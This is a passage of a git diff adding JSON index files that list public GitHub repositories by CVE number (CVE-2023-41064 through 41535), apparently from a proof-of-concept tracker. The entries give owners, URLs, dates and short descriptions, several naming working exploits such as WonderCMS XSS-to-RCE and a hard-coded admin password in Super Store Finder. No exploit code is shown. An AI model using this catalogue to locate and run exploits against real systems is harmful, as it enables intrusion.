at end of file diff --git a/2023/CVE-2023-41064.json b/2023/CVE-2023-41064.json new file mode 100644 index 0000000000..fa4ab94b2c --- /dev/null +++ b/2023/CVE-2023-41064.json @@ -0,0 +1,95 @@ +[ + { + "id": 712037145, + "name": "vulnerabilidad-LibWebP-CVE-2023-41064", + "full_name": "MrR0b0t19\/vulnerabilidad-LibWebP-CVE-2023-41064", + "owner": { + "login": "MrR0b0t19", + "id": 63489501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4", + "html_url": "https:\/\/github.com\/MrR0b0t19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrR0b0t19\/vulnerabilidad-LibWebP-CVE-2023-41064", + "description": "longitudes de código para desencadenar esta vulnerabilidad", + "fork": false, + "created_at": "2023-10-30T17:03:24Z", + "updated_at": "2023-10-30T17:19:13Z", + "pushed_at": "2023-11-23T21:38:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 718237903, + "name": "CVE-2023-41064", + "full_name": "MrR0b0t19\/CVE-2023-41064", + "owner": { + "login": "MrR0b0t19", + "id": 63489501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4", + "html_url": "https:\/\/github.com\/MrR0b0t19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrR0b0t19\/CVE-2023-41064", + "description": null, + "fork": false, + "created_at": "2023-11-13T17:07:02Z", + "updated_at": "2024-09-05T02:57:07Z", + "pushed_at": "2023-11-13T17:07:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753988072, + "name": "CVE-2023-41064-POC", + "full_name": "sarsaeroth\/CVE-2023-41064-POC", + "owner": { + "login": "sarsaeroth", + "id": 159212133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4", + "html_url": "https:\/\/github.com\/sarsaeroth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sarsaeroth\/CVE-2023-41064-POC", + "description": "C implementation of Image I\/O 0-click vulnerability", + "fork": false, + "created_at": "2024-02-07T07:11:41Z", + "updated_at": "2024-03-22T17:09:51Z", + "pushed_at": "2024-02-07T07:11:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41080.json b/2023/CVE-2023-41080.json new file mode 100644 index 0000000000..cfb3fde4d2 --- /dev/null +++ b/2023/CVE-2023-41080.json @@ -0,0 +1,33 @@ +[ + { + "id": 683435690, + "name": "CVE-2023-41080", + "full_name": "shiomiyan\/CVE-2023-41080", + "owner": { + "login": "shiomiyan", + "id": 35842766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35842766?v=4", + "html_url": "https:\/\/github.com\/shiomiyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shiomiyan\/CVE-2023-41080", + "description": null, + "fork": false, + "created_at": "2023-08-26T15:11:31Z", + "updated_at": "2024-12-09T01:45:15Z", + "pushed_at": "2023-08-31T14:44:10Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41265.json b/2023/CVE-2023-41265.json new file mode 100644 index 0000000000..5eb961d669 --- /dev/null +++ b/2023/CVE-2023-41265.json @@ -0,0 +1,33 @@ +[ + { + "id": 685151719, + "name": "zeroqlik-detect", + "full_name": "praetorian-inc\/zeroqlik-detect", + "owner": { + "login": "praetorian-inc", + "id": 8173787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8173787?v=4", + "html_url": "https:\/\/github.com\/praetorian-inc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/praetorian-inc\/zeroqlik-detect", + "description": "A Nuclei template to detect ZeroQlik (CVE-2023-41265 and CVE-2023-41266)", + "fork": false, + "created_at": "2023-08-30T16:15:19Z", + "updated_at": "2024-08-26T16:00:12Z", + "pushed_at": "2023-08-30T18:28:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4128.json b/2023/CVE-2023-4128.json new file mode 100644 index 0000000000..05303187a8 --- /dev/null +++ b/2023/CVE-2023-4128.json @@ -0,0 +1,33 @@ +[ + { + "id": 693501334, + "name": "linux-4.1.15_CVE-2023-4128", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2023-4128", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2023-4128", + "description": null, + "fork": false, + "created_at": "2023-09-19T06:45:47Z", + "updated_at": "2023-09-19T06:52:28Z", + "pushed_at": "2023-09-19T08:02:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41362.json b/2023/CVE-2023-41362.json new file mode 100644 index 0000000000..f3501c75a2 --- /dev/null +++ b/2023/CVE-2023-41362.json @@ -0,0 +1,33 @@ +[ + { + "id": 689929838, + "name": "CVE-2023-41362_MyBB_ACP_RCE", + "full_name": "SorceryIE\/CVE-2023-41362_MyBB_ACP_RCE", + "owner": { + "login": "SorceryIE", + "id": 74211927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74211927?v=4", + "html_url": "https:\/\/github.com\/SorceryIE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SorceryIE\/CVE-2023-41362_MyBB_ACP_RCE", + "description": null, + "fork": false, + "created_at": "2023-09-11T07:49:38Z", + "updated_at": "2024-11-18T22:06:54Z", + "pushed_at": "2023-09-11T10:19:29Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41425.json b/2023/CVE-2023-41425.json new file mode 100644 index 0000000000..c91449b0d7 --- /dev/null +++ b/2023/CVE-2023-41425.json @@ -0,0 +1,418 @@ +[ + { + "id": 714671678, + "name": "CVE-2023-41425", + "full_name": "prodigiousMind\/CVE-2023-41425", + "owner": { + "login": "prodigiousMind", + "id": 76691910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76691910?v=4", + "html_url": "https:\/\/github.com\/prodigiousMind", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prodigiousMind\/CVE-2023-41425", + "description": "WonderCMS Authenticated RCE - CVE-2023-41425", + "fork": false, + "created_at": "2023-11-05T15:06:43Z", + "updated_at": "2025-01-07T20:39:32Z", + "pushed_at": "2024-12-30T09:28:44Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cves", + "exploit", + "rce-exploit", + "wondercms" + ], + "visibility": "public", + "forks": 7, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841103105, + "name": "CVE-2023-41425", + "full_name": "charlesgargasson\/CVE-2023-41425", + "owner": { + "login": "charlesgargasson", + "id": 26895987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895987?v=4", + "html_url": "https:\/\/github.com\/charlesgargasson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesgargasson\/CVE-2023-41425", + "description": "Wonder CMS RCE (XSS)", + "fork": false, + "created_at": "2024-08-11T16:43:56Z", + "updated_at": "2024-08-12T16:36:36Z", + "pushed_at": "2024-08-11T18:40:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-41425", + "exploit", + "htb", + "poc", + "rce", + "wondercms" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841302917, + "name": "CVE-2023-41425", + "full_name": "insomnia-jacob\/CVE-2023-41425", + "owner": { + "login": "insomnia-jacob", + "id": 174169862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174169862?v=4", + "html_url": "https:\/\/github.com\/insomnia-jacob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/insomnia-jacob\/CVE-2023-41425", + "description": "WonderCMS RCE CVE-2023-41425", + "fork": false, + "created_at": "2024-08-12T06:16:17Z", + "updated_at": "2025-01-04T15:00:18Z", + "pushed_at": "2024-08-12T06:55:30Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846300471, + "name": "CVE-2023-41425", + "full_name": "SpycioKon\/CVE-2023-41425", + "owner": { + "login": "SpycioKon", + "id": 77606941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77606941?v=4", + "html_url": "https:\/\/github.com\/SpycioKon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpycioKon\/CVE-2023-41425", + "description": "Research", + "fork": false, + "created_at": "2024-08-22T23:27:48Z", + "updated_at": "2024-08-22T23:28:16Z", + "pushed_at": "2024-08-22T23:28:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848360316, + "name": "CVE-2023-41425-wonderCMS_RCE", + "full_name": "thefizzyfish\/CVE-2023-41425-wonderCMS_RCE", + "owner": { + "login": "thefizzyfish", + "id": 94797978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94797978?v=4", + "html_url": "https:\/\/github.com\/thefizzyfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thefizzyfish\/CVE-2023-41425-wonderCMS_RCE", + "description": "CVE-2023-41425 - Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.", + "fork": false, + "created_at": "2024-08-27T16:10:08Z", + "updated_at": "2024-11-01T10:42:25Z", + "pushed_at": "2024-10-03T19:30:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851554006, + "name": "CVE-2023-41425", + "full_name": "Raffli-Dev\/CVE-2023-41425", + "owner": { + "login": "Raffli-Dev", + "id": 154855593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154855593?v=4", + "html_url": "https:\/\/github.com\/Raffli-Dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Raffli-Dev\/CVE-2023-41425", + "description": null, + "fork": false, + "created_at": "2024-09-03T09:59:42Z", + "updated_at": "2024-09-03T10:28:25Z", + "pushed_at": "2024-09-03T10:28:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 866576110, + "name": "CVE-2023-41425", + "full_name": "duck-sec\/CVE-2023-41425", + "owner": { + "login": "duck-sec", + "id": 129839654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129839654?v=4", + "html_url": "https:\/\/github.com\/duck-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duck-sec\/CVE-2023-41425", + "description": "CVE-2023-41425 (Wonder CMS XSS to RCE) exploit which serves required scripts locally. Good if you're lost at sea and have found a problem with your bike.", + "fork": false, + "created_at": "2024-10-02T14:05:19Z", + "updated_at": "2024-12-23T04:25:21Z", + "pushed_at": "2024-10-02T14:20:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879409340, + "name": "WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425", + "full_name": "0xDTC\/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425", + "description": "CVE-2023-41425 Refurbish", + "fork": false, + "created_at": "2024-10-27T20:28:57Z", + "updated_at": "2025-01-07T12:53:24Z", + "pushed_at": "2025-01-07T12:53:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 880915888, + "name": "CVE-2023-41425", + "full_name": "h3athen\/CVE-2023-41425", + "owner": { + "login": "h3athen", + "id": 48544502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48544502?v=4", + "html_url": "https:\/\/github.com\/h3athen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3athen\/CVE-2023-41425", + "description": "Writing one because the one I found isn't working", + "fork": false, + "created_at": "2024-10-30T15:38:52Z", + "updated_at": "2024-10-30T15:43:53Z", + "pushed_at": "2024-10-30T15:43:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893536910, + "name": "CVE-2023-41425-WonderCMS-Authenticated-RCE", + "full_name": "Diegomjx\/CVE-2023-41425-WonderCMS-Authenticated-RCE", + "owner": { + "login": "Diegomjx", + "id": 55863604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55863604?v=4", + "html_url": "https:\/\/github.com\/Diegomjx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diegomjx\/CVE-2023-41425-WonderCMS-Authenticated-RCE", + "description": "Xss injection, WonderCMS 3.2.0 -3.4.2 ", + "fork": false, + "created_at": "2024-11-24T17:39:45Z", + "updated_at": "2025-01-07T23:11:24Z", + "pushed_at": "2024-11-24T18:08:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896579626, + "name": "CVE-2023-41425", + "full_name": "0x0d3ad\/CVE-2023-41425", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2023-41425", + "description": "CVE-2023-41425 (XSS to RCE, Wonder CMS 3.2.0 <= 3.4.2)", + "fork": false, + "created_at": "2024-11-30T18:34:05Z", + "updated_at": "2024-11-30T19:28:45Z", + "pushed_at": "2024-11-30T18:43:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906949510, + "name": "CVE-2023-41425", + "full_name": "xpltive\/CVE-2023-41425", + "owner": { + "login": "xpltive", + "id": 25474369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25474369?v=4", + "html_url": "https:\/\/github.com\/xpltive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xpltive\/CVE-2023-41425", + "description": "WonderCMS v3.2.0 - v3.4.2 XSS to RCE exploit", + "fork": false, + "created_at": "2024-12-22T11:53:14Z", + "updated_at": "2024-12-31T18:07:17Z", + "pushed_at": "2024-12-23T14:22:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912981235, + "name": "CVE-2023-41425", + "full_name": "samu21req\/CVE-2023-41425", + "owner": { + "login": "samu21req", + "id": 61760887, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61760887?v=4", + "html_url": "https:\/\/github.com\/samu21req", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/samu21req\/CVE-2023-41425", + "description": null, + "fork": false, + "created_at": "2025-01-06T19:38:36Z", + "updated_at": "2025-01-06T19:44:38Z", + "pushed_at": "2025-01-06T19:44:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41436.json b/2023/CVE-2023-41436.json new file mode 100644 index 0000000000..6943c2c7a1 --- /dev/null +++ b/2023/CVE-2023-41436.json @@ -0,0 +1,33 @@ +[ + { + "id": 682073746, + "name": "CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content", + "full_name": "sromanhu\/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content", + "description": "CSZ CMS 1.3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Additional Meta Tag parameter in the Pages Content Menu.", + "fork": false, + "created_at": "2023-08-23T11:34:30Z", + "updated_at": "2023-09-25T14:18:40Z", + "pushed_at": "2023-09-22T12:20:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4145.json b/2023/CVE-2023-4145.json new file mode 100644 index 0000000000..d0343ca838 --- /dev/null +++ b/2023/CVE-2023-4145.json @@ -0,0 +1,95 @@ +[ + { + "id": 786354655, + "name": "CVE-2023-4145-2", + "full_name": "miguelc49\/CVE-2023-4145-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:01Z", + "updated_at": "2024-04-14T17:40:27Z", + "pushed_at": "2024-04-14T17:40:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354666, + "name": "CVE-2023-4145-1", + "full_name": "miguelc49\/CVE-2023-4145-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:04Z", + "updated_at": "2024-04-14T17:40:24Z", + "pushed_at": "2024-04-14T17:40:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354680, + "name": "CVE-2023-4145-3", + "full_name": "miguelc49\/CVE-2023-4145-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-4145-3", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:39:09Z", + "updated_at": "2024-04-14T17:40:32Z", + "pushed_at": "2024-04-14T17:40:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4147.json b/2023/CVE-2023-4147.json new file mode 100644 index 0000000000..67164a3695 --- /dev/null +++ b/2023/CVE-2023-4147.json @@ -0,0 +1,33 @@ +[ + { + "id": 910222440, + "name": "Exploit-en-Python-para-CVE-2023-4147", + "full_name": "murdok1982\/Exploit-en-Python-para-CVE-2023-4147", + "owner": { + "login": "murdok1982", + "id": 14059710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14059710?v=4", + "html_url": "https:\/\/github.com\/murdok1982", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murdok1982\/Exploit-en-Python-para-CVE-2023-4147", + "description": null, + "fork": false, + "created_at": "2024-12-30T18:08:46Z", + "updated_at": "2024-12-30T18:10:25Z", + "pushed_at": "2024-12-30T18:10:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41474.json b/2023/CVE-2023-41474.json new file mode 100644 index 0000000000..e4e72e231d --- /dev/null +++ b/2023/CVE-2023-41474.json @@ -0,0 +1,33 @@ +[ + { + "id": 740379330, + "name": "CVE-2023-41474", + "full_name": "JBalanza\/CVE-2023-41474", + "owner": { + "login": "JBalanza", + "id": 31896165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31896165?v=4", + "html_url": "https:\/\/github.com\/JBalanza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JBalanza\/CVE-2023-41474", + "description": "Public disclosure of Ivanti's Avalanche Path Traversal vulnerability", + "fork": false, + "created_at": "2024-01-08T08:21:39Z", + "updated_at": "2024-08-12T20:33:09Z", + "pushed_at": "2024-01-08T08:46:27Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41507.json b/2023/CVE-2023-41507.json new file mode 100644 index 0000000000..335abd3b95 --- /dev/null +++ b/2023/CVE-2023-41507.json @@ -0,0 +1,33 @@ +[ + { + "id": 687283979, + "name": "CVE-2023-41507", + "full_name": "redblueteam\/CVE-2023-41507", + "owner": { + "login": "redblueteam", + "id": 29709246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29709246?v=4", + "html_url": "https:\/\/github.com\/redblueteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redblueteam\/CVE-2023-41507", + "description": "CVE-2023-41507 A hard coded password in Super Store Finder v3.6 allows attackers to access the administration panel.", + "fork": false, + "created_at": "2023-09-05T03:26:15Z", + "updated_at": "2023-09-05T03:26:16Z", + "pushed_at": "2023-09-07T23:38:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41508.json b/2023/CVE-2023-41508.json new file mode 100644 index 0000000000..07c4e168fc --- /dev/null +++ b/2023/CVE-2023-41508.json @@ -0,0 +1,33 @@ +[ + { + "id": 687284713, + "name": "CVE-2023-41508", + "full_name": "redblueteam\/CVE-2023-41508", + "owner": { + "login": "redblueteam", + "id": 29709246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29709246?v=4", + "html_url": "https:\/\/github.com\/redblueteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redblueteam\/CVE-2023-41508", + "description": "CVE-2023-41508 - A hard-coded password in Super Store Finder v3.6 allows attackers to access the administration panel.", + "fork": false, + "created_at": "2023-09-05T03:29:37Z", + "updated_at": "2023-11-02T03:37:03Z", + "pushed_at": "2023-09-07T23:41:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41533.json b/2023/CVE-2023-41533.json new file mode 100644 index 0000000000..d46a6fa208 --- /dev/null +++ b/2023/CVE-2023-41533.json @@ -0,0 +1,33 @@ +[ + { + "id": 688436461, + "name": "CVE-2023-41533", + "full_name": "Sh33talUmath\/CVE-2023-41533", + "owner": { + "login": "Sh33talUmath", + "id": 144338561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4", + "html_url": "https:\/\/github.com\/Sh33talUmath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41533", + "description": null, + "fork": false, + "created_at": "2023-09-07T10:50:03Z", + "updated_at": "2023-09-07T10:50:03Z", + "pushed_at": "2023-09-07T10:57:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41534.json b/2023/CVE-2023-41534.json new file mode 100644 index 0000000000..535fe31986 --- /dev/null +++ b/2023/CVE-2023-41534.json @@ -0,0 +1,33 @@ +[ + { + "id": 688439636, + "name": "CVE-2023-41534", + "full_name": "Sh33talUmath\/CVE-2023-41534", + "owner": { + "login": "Sh33talUmath", + "id": 144338561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144338561?v=4", + "html_url": "https:\/\/github.com\/Sh33talUmath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh33talUmath\/CVE-2023-41534", + "description": null, + "fork": false, + "created_at": "2023-09-07T10:58:32Z", + "updated_at": "2023-09-07T10:58:32Z", + "pushed_at": "2023-09-07T10:59:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-41535.json b/2023/CVE-2023-41535.json new file mode 100644 index 0000000000..5ebec7ad30 --- /dev/null +++ b/2023/CVE-2023-41535.json @@ -0,0 +1,33 @@ +[ + { + "id": 